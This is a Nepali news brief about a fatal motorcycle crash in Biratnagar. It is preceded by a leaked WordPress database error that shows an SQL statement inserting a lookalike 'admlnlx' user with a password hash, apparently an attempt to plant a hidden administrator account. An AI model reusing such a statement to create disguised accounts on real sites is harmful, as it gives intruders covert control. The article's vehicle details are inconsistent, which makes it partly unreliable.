WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BbQB21yaPp8BIZBzy.pJvSR.mfBst5/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 15:14:46', '', 'admlnlx', 'admlnlx')
विराटनगर,पुस २९ –
मोेरङको विराटनगरस्थित विद्युत् प्राधिकरण कार्यालय नजिकै आज भएको सडक दुर्घटनामा एक जनाको मृत्यु भएको छ ।
मृत्यु हुनेमा विराटनगर–८ बस्ने ३५ वर्षीय मनिस दुगड रहेका छन् । दक्षिणतर्फ जाँदै गरेको सशस्त्र प्रहरी बलको बा१ग १८७३ नंको गाडीलाई उत्तरतर्फ जाँदै गरेको को१त ६५८४ नंको मोटरसाइकलले उछिन्न खोज्दा गाडीमा ठक्कर लागेर मोटरसाइकल चालक दुगडको मृत्यु भएको स्थानीयले बताएका छन् ।
उत्तरतर्फ जाँदै गरेको बा१ग १८७३ नंको ट्र्याक्टरका कारण दुर्घटना भएको आशङ्का रहेको भन्दै दुर्घटनाबारे छानबिन भइरहेको प्रहरीले जनाएको छ । – रासस